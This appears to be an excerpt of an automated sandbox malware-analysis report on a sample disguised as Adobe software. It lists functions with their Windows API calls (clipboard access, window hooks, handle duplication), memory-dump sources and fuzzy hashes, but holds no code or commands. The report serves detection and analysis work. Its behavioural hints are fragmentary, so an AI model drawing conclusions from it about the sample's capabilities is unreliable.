Instruction Fuzzy Hash: 023111B0D01248DFDB10DFA9C984BDEBBF1AB48304F208059E409BB394DBB49845CFA1

Function 06DE7E80 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06DE8560

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 8f875a43578519a38c342364e6ffc841bff14d7f19970be255512926db2c046a
Instruction ID: 5247d0bc979759f85a8d7b3925e4e4dab053eefa8103d21901b8ab846c95a1c5
Opcode Fuzzy Hash: 8f875a43578519a38c342364e6ffc841bff14d7f19970be255512926db2c046a
Instruction Fuzzy Hash: B6310FB0D01248DFDB50DF99C984B9EBBF5AB48304F208059E405BB2A4DBB5A845CBA5

Function 06DE68F0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE697F

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 037ccac8d503d18e19c6991835cbe626b8cc9232ddd4da2f572e17b0650a7b8a
Instruction ID: 0217b52bb9cab8129b718a14147a7ea54c361d655dedd26970b6bf7ac71b5681
Opcode Fuzzy Hash: 037ccac8d503d18e19c6991835cbe626b8cc9232ddd4da2f572e17b0650a7b8a
Instruction Fuzzy Hash: EF21E5B5D002489FDB10CFAAD984ADEBFF9EB48310F14841AE958A7311D374A950CFA5

Function 06DEA020 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DEA0A3

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: be0da84d95dae47f26631a92dd1764bee57a12d9dae31d395990c0c2b3eee149
Instruction ID: 2ab4b361cc60662d03845fa2c9b1d699a09c1c7c066b07b9c1ab37863f1492e7
Opcode Fuzzy Hash: be0da84d95dae47f26631a92dd1764bee57a12d9dae31d395990c0c2b3eee149
Instruction Fuzzy Hash: E62147B1D00209DFCB14DF9AD844BEEFBF9BB88320F14842AE459A7254C775A944CFA1

Function 06DE68F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE697F

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7e518df7ea43d6a263b8030a3520a7ced404b73b8a1544e8f5f9861e78a7020e
Instruction ID: 2abf08efba682db0b816866e4a522698cd39743dcd35666e3c1cc96005a3056e
Opcode Fuzzy Hash: 7e518df7ea43d6a263b8030a3520a7ced404b73b8a1544e8f5f9861e78a7020e
Instruction Fuzzy Hash: 3321E4B5D002489FDB10CF9AD984ADEFBF4EB48310F14841AE958A7310D374A940CFA4

Function 06DEA028 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DEA0A3

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 84bfa600a501dc8aa3c8e1a3aea7923344501819151a73a4bb2e244ae382d0ad
Instruction ID: 997de7edd876f77d5f58eb560fe33c2f6e8c6b72771fddaa0175245793fb7f0e
Opcode Fuzzy Hash: 84bfa600a501dc8aa3c8e1a3aea7923344501819151a73a4bb2e244ae382d0ad
Instruction Fuzzy Hash: D82124B1D002498FCB14DF9AC944BEEFBF5BB88320F14842AE458A7254C775A940CFA5

Function 016CEE18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 016CEE7F

Memory Dump Source

Source File: 00000004.00000002.4115373441.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16c0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e225147027a2a43a2baeb9af82963a280175c6b47798d5371d7421e1c84c91cb
Instruction ID: 2f6ef8ea0f311a5b73646957768d8c799b53c8aabc5dbdcd2b0fad89e8cfa46b
Opcode Fuzzy Hash: e225147027a2a43a2baeb9af82963a280175c6b47798d5371d7421e1c84c91cb
Instruction Fuzzy Hash: 9B11E2B1C006599BCB10DF9AC544BDEFBF4EB48320F15856AD818A7251D378A944CFA5

Function 06DE194B Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06DE19B6

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 38198871683d8117f76669ac79e385367b13e461dfc58012e38a8d2bcca5ac96
Instruction ID: 568496622538f44e2afa946b7f7e3ef4e16e7a085a0c874d542b7abd4f519846
Opcode Fuzzy Hash: 38198871683d8117f76669ac79e385367b13e461dfc58012e38a8d2bcca5ac96
Instruction Fuzzy Hash: 32110FB5D002498FDB10DF9AD844BDEFBF4AB88224F14842AD4A9B7310C379A585CFA5

Function 06DE1950 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06DE19B6

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4deafaefe7ed4e2f1b85ccf36a52e0fa9dc486625e6e0e7dc516cf299b555765
Instruction ID: ebf763cc67c6f7cf666b48705c983142504adda21c18c4649d73fc33c1fe71f2
Opcode Fuzzy Hash: 4deafaefe7ed4e2f1b85ccf36a52e0fa9dc486625e6e0e7dc516cf299b555765
Instruction Fuzzy Hash: D011E0B5D006498FCB10DF9AD844BDEFBF4AB88324F14842AD469B7310C379A545CFA5

Function 06DE64BC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06DE7A95), ref: 06DE7B1F

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: eb0c577d06ff36daa4c48e9fd3aab7b593d72307081a5bd665dcf4b31203306a
Instruction ID: 9db9eee3b2f143398d27d90addab43ce37ab4b82911c46f5e4b718cca91e4c0d
Opcode Fuzzy Hash: eb0c577d06ff36daa4c48e9fd3aab7b593d72307081a5bd665dcf4b31203306a
Instruction Fuzzy Hash: 141133B1C00248CFCB50DF9AD444BDEBBF4EB48324F208429D559A7300C374A944CFA4

Function 06DE8389 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06DE83E5

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: dff4524b13f88937a96a1c99c68efbe5520e10bd349f3e91ecba5d63faa45100
Instruction ID: 9e30f58f4159c3b6aae6af7ab9f89213f595e910b37144fdb70583c907ffb5b4
Opcode Fuzzy Hash: dff4524b13f88937a96a1c99c68efbe5520e10bd349f3e91ecba5d63faa45100
Instruction Fuzzy Hash: 4B1100B5D043488FCB20DF9AD448BDEBBF4AB48324F20845AE459A7350C779A944CFA5

Function 06DE7D6C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06DE83E5

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 667f7e914b1b233f19208775e7bc39fd4cb5952fa7549e93fc7d6f1d9d83b360
Instruction ID: f18742d759af971ee6e9ca9349a2f5ee89635fa4fbc948d06a112d42cbfd3d09
Opcode Fuzzy Hash: 667f7e914b1b233f19208775e7bc39fd4cb5952fa7549e93fc7d6f1d9d83b360
Instruction Fuzzy Hash: 391100B1D043488FCB20DF9AD848BDEBBF4EB48324F208459E559A7310C378A944CFA5

Function 06DE7AB8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06DE7A95), ref: 06DE7B1F

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: eb7adef13b7c1a15cab04204942d74a9ce41cbd723f7ce1118f78b4b39fc658c
Instruction ID: c2d973ebc2ed876f1edb0af54f9d5d6774f31d47b9ca59bed6d467d5054f1a6e
Opcode Fuzzy Hash: eb7adef13b7c1a15cab04204942d74a9ce41cbd723f7ce1118f78b4b39fc658c
Instruction Fuzzy Hash: 9411F2B5C042498FCB50DF9AD845BDEBBF4AB48324F208429E558A7250C774A984CFA5

Function 06DF4B09 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

XPpq, xrefs: 06DF4C45

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: XPpq
API String ID: 0-1266478781
Opcode ID: 98563519758aa66fec5f02cc13679b5135ff2e3bbe27ec237d7e7f5043874f1f
Instruction ID: 6be73ff591bd11b91d3f70e637b60cc896427812743387cc547903334b401f06
Opcode Fuzzy Hash: 98563519758aa66fec5f02cc13679b5135ff2e3bbe27ec237d7e7f5043874f1f
Instruction Fuzzy Hash: D0416F70F102189FDB54DBA9C854BAFBAF7FF88300F208529E105AB3A5DA759C45CB90

Function 06DFDA50 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06DFDB99

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: eecb6021b066af4543186dc2fb3d8df6926dcf438674b998939bc2cc672e9d49
Instruction ID: f516e6bcae69a90867268e18e42fa04605c02f7a14eceaa8bd01bf2c8d9564f0
Opcode Fuzzy Hash: eecb6021b066af4543186dc2fb3d8df6926dcf438674b998939bc2cc672e9d49
Instruction Fuzzy Hash: C441E170E202099FDB61DF65C58469EBBB7FF85344F218829E506EB244DB74D886CB80

Function 06DFDA3D Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06DFDB99

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 9fe9a230150f24b0f53261b3a9975faf9004efbfafcb3bcfdef079dd10695c15
Instruction ID: 1fbcb5b4cedacfd9c07c96e5621ad290d200cd969ada5c394f323d2e4e985de9
Opcode Fuzzy Hash: 9fe9a230150f24b0f53261b3a9975faf9004efbfafcb3bcfdef079dd10695c15
Instruction Fuzzy Hash: 6941E170E203059FDB61CF65D58469EBBB6FF86344F214929E502EB240DB74E882CB80

Function 06DF21B5 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06DF2303

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: ac954e2743f7afaa2387815b7989432277049a78b284bb456fe13df0c4c4c068
Instruction ID: 177ba688d73e3f6062474c1f96b685f06a919e1cc1fc1c3cc3d57551e75487bb
Opcode Fuzzy Hash: ac954e2743f7afaa2387815b7989432277049a78b284bb456fe13df0c4c4c068
Instruction Fuzzy Hash: EB313130B102018FDB659BB4D61866F7BE6AF8A300F29846CD106DB3A5DF36DD41CB90

Function 06DF21C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06DF2303

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: d341578d82ba2624d5693808e51ef958d174ab927542d34c291f2cddb7929e35
Instruction ID: 497ab8030677f00938a9c3256b9c9e127f44fe344c91d99838516906d0e0f305
Opcode Fuzzy Hash: d341578d82ba2624d5693808e51ef958d174ab927542d34c291f2cddb7929e35
Instruction Fuzzy Hash: C631FE70B102018FDB659BB4D61466F7BE6BF89304F258428D506DB398DE36DD41C791

Function 06DFFEE9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

|, xrefs: 06DFFF48

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 040e77bb05970f5a4625b5548eb928890c5f83e989051c23fd668bc36472137c
Instruction ID: ca76044126e63299d1ee8f462c8b0fc727bb3d48ff0ad957b4075a6edf85ab51
Opcode Fuzzy Hash: 040e77bb05970f5a4625b5548eb928890c5f83e989051c23fd668bc36472137c
Instruction Fuzzy Hash: 6F115C75F102149FDB949F78C808B5E77F5AF48750F10846AE94AEB3A0DB359900CB84

Function 06DFFEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 06DFFF48

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 5b593f912d93255a3cb46632d714fbbf7ed9ebbf4dea0b294e0f4c77126293e1
Instruction ID: 6390cd318fcf09718297057ca92ac0ee4c974b626e28b3a40c6899a086033de8
Opcode Fuzzy Hash: 5b593f912d93255a3cb46632d714fbbf7ed9ebbf4dea0b294e0f4c77126293e1
Instruction Fuzzy Hash: 7E115E75B50225DFDB84DB78C804B6E77F5AF48750F10846AE64AEB3A0DB799900CB84

Function 06DFB198 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753a2ee39314ca0bd426d9872ada19fad30373eb188a82a28a5a89c7cac37374
Instruction ID: 03fa0ac02408b5dce7744370296e55ac80d892199adada9652bf52e10f0a1f7c
Opcode Fuzzy Hash: 753a2ee39314ca0bd426d9872ada19fad30373eb188a82a28a5a89c7cac37374
Instruction Fuzzy Hash: 70A1A734F202098FEF64DBACD5907BEB7B6EB89310F258826E505E7395CA39DC818751

Function 06DFFB27 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb34d75d2e4494ba2c0efa4e87df66166f4c19180179e5d2ed8e9a337220df9c
Instruction ID: eee75d72ec20b921202235fa378a0b7a8e4bad5dd0476f0800e5bf31d9855994
Opcode Fuzzy Hash: bb34d75d2e4494ba2c0efa4e87df66166f4c19180179e5d2ed8e9a337220df9c
Instruction Fuzzy Hash: CF81E271F20105DFDF649BB8E8947ADB7A6EB84311F21482AE20ADB354DB35CC45CB91

Function 06DF6158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950c2445689c16af9a1831297b79a79865a1125972d0c176ff4158a5c1f80230
Instruction ID: 8d5a1b1265f12e80ceed1d01f0a072749a12d86ffdaccee115b221680480654c
Opcode Fuzzy Hash: 950c2445689c16af9a1831297b79a79865a1125972d0c176ff4158a5c1f80230
Instruction Fuzzy Hash: 8361D1B2F101214FCF149B7EC88066EBAEBAF94610B154439E90ADB379DEA5DC0287C1

Function 06DF4251 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3ed9698333878f50f1846c41a35ca553ea446c9663261bbaa7954aa707630c
Instruction ID: 26e3424cca75c1fedba0e0a644db36563dcac5db7974d9b36f23f7a1a3411f74
Opcode Fuzzy Hash: dd3ed9698333878f50f1846c41a35ca553ea446c9663261bbaa7954aa707630c
Instruction Fuzzy Hash: 0D814B30B102098BDF54DFA8D5946AEB7F6EF89300F118429D50ADB395EA75DC428B81

Function 06DF456C Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0023ddb2fc12755338038911681892e318d395aa5fb6818290e5087cf2299994
Instruction ID: 9dcd0a917ab4911b326fcec181c13da5f7ed0e182a00feffd2646aaa6187e19e
Opcode Fuzzy Hash: 0023ddb2fc12755338038911681892e318d395aa5fb6818290e5087cf2299994
Instruction Fuzzy Hash: E5913D34E106198FDF60DF68C890B9EB7B1FF89310F208599D549AB395DB70AA85CF90

Function 06DF4260 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1421ff85128229270e6028bf678502f24a67daf67b97d0de7109ca65651862
Instruction ID: 7a576befde2b7b3efdfd5cc65b2786d681ea6eee1644ffb450f25bae9f977a28
Opcode Fuzzy Hash: 5d1421ff85128229270e6028bf678502f24a67daf67b97d0de7109ca65651862
Instruction Fuzzy Hash: D8814C30B102098BDF54DFA9D5547AFB7F6AF89300F118429D50ADB395EB75DC428B41

Function 06DF4580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59fc73a8cdb110e51d7a0f95a0bac00c6aa87f20cb650893481b5279d8acabfe
Instruction ID: 0110ee9630563b952bdad51aa96540f75c732cd5367d26f73a7a00cdeb3093d1
Opcode Fuzzy Hash: 59fc73a8cdb110e51d7a0f95a0bac00c6aa87f20cb650893481b5279d8acabfe
Instruction Fuzzy Hash: FC911E34E1061A8FDF60DF68C890B9EB7B1FF89310F208599D549AB395DB70A985CF90

Function 06DFEE98 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89db8de360c692d5c724d9a3e2175d96be5878be95d23fb07fa6ba4733957222
Instruction ID: 9855ed725a5daaef3e44b6c1f69462ce8b62888c11d2cd8c61dacc38dbf36271
Opcode Fuzzy Hash: 89db8de360c692d5c724d9a3e2175d96be5878be95d23fb07fa6ba4733957222
Instruction Fuzzy Hash: 87714B70A102099FDB54DFA9D980AAEBBF6FF84300F258429D505EB365DB70EC46CB50

Function 06DFEEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2962eba04b2dcd868fffc46c9bf4020a5c3f74e941196bc3e12c2eccf40961a1
Instruction ID: d53cae0aaf56d823e76cd951779edae742696a60ebf47dc40329cf6b4618ecfd
Opcode Fuzzy Hash: 2962eba04b2dcd868fffc46c9bf4020a5c3f74e941196bc3e12c2eccf40961a1
Instruction Fuzzy Hash: 1D712A70A102099FDB54DFA9D980AAEBBF6FF84304F258429D505EB365DB70EC46CB50

Function 06DFF8D9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba34d04574971888572e672e93040b4fd923624b1ea3c3ff0f9c05d530e49230
Instruction ID: 05f48b3c1daac9c4761c61f43055e024d7a15c75573766b8e1b36b23d1f9e4f9
Opcode Fuzzy Hash: ba34d04574971888572e672e93040b4fd923624b1ea3c3ff0f9c05d530e49230
Instruction Fuzzy Hash: 26510670B20214DFEF645B6CD95472F3A9ED789340F21482BE20AD73E8D969CC8547A2

Function 06DFF8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f618ac178135be8e427bca11c07a13acd414e53fedd4a2903b46b279fdd4aef
Instruction ID: 95abc553eefd8629d51a545f0bfa941f0931f362cd92d0b92d5514f9279f7fe7
Opcode Fuzzy Hash: 0f618ac178135be8e427bca11c07a13acd414e53fedd4a2903b46b279fdd4aef
Instruction Fuzzy Hash: 7451D470B20214DFEF645B6CE95872F369ED789350F21482BE20AD73E8D969CC8547A2

Function 06DF53D0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69ce6040c6f9c09200f3cdb1da16e934056fc2d5e52f5b7f9cef95bafd39ee3
Instruction ID: 07235c3df110c24ec792ca7712bb966f643c65b6216d22388125a2aa1dd31913
Opcode Fuzzy Hash: f69ce6040c6f9c09200f3cdb1da16e934056fc2d5e52f5b7f9cef95bafd39ee3
Instruction Fuzzy Hash: DF413A71E106099BDF70CFA9E880AAFFBF6FB98310F11492AD256D7650D330E8558B90

Function 06DF2078 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed8a1a0aac106bf94579aae2e246c101d8b941464c02ee55208a07f1e2548c5
Instruction ID: 1683580ca60475fab09ff027cefd3185b42dbee1be2bafb0d2146d93b04d93d9
Opcode Fuzzy Hash: 8ed8a1a0aac106bf94579aae2e246c101d8b941464c02ee55208a07f1e2548c5
Instruction Fuzzy Hash: 0631A031E202159BCB58CFA5D99469EB7F2FF89300F118529EA06EB350DB71ED42CB90

Function 06DF2088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48442dee07e3b4f1981387ad7537ff6c54f858e0a932222d958bcbcd873eac25
Instruction ID: e57e31f0c012ea2cb7f448bbecce75e7acddb82143c5169408ff46f2321d5252
Opcode Fuzzy Hash: 48442dee07e3b4f1981387ad7537ff6c54f858e0a932222d958bcbcd873eac25
Instruction Fuzzy Hash: CB316E70E202159BCB58CFA9D99469EB7B6FF89300F108929E906EB350DB75ED42CB50

Function 06DF3E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85daaf9ed11b6b75154eb509d126f10216b9e61723fa00315d6586575d2cd76b
Instruction ID: ba43a893434d178850abbbe9c15a60cbd3d27d9e221a2e77395e211490ecde09
Opcode Fuzzy Hash: 85daaf9ed11b6b75154eb509d126f10216b9e61723fa00315d6586575d2cd76b
Instruction Fuzzy Hash: A2215A75F102159FDB80CFA9D980AAEB7F5EF48710F128029EA05E7250EB75ED408B90

Function 013FD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112929346.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132eec231f5b125dfc7a13555e010b76947f9081450281d9d4647372e6f7065
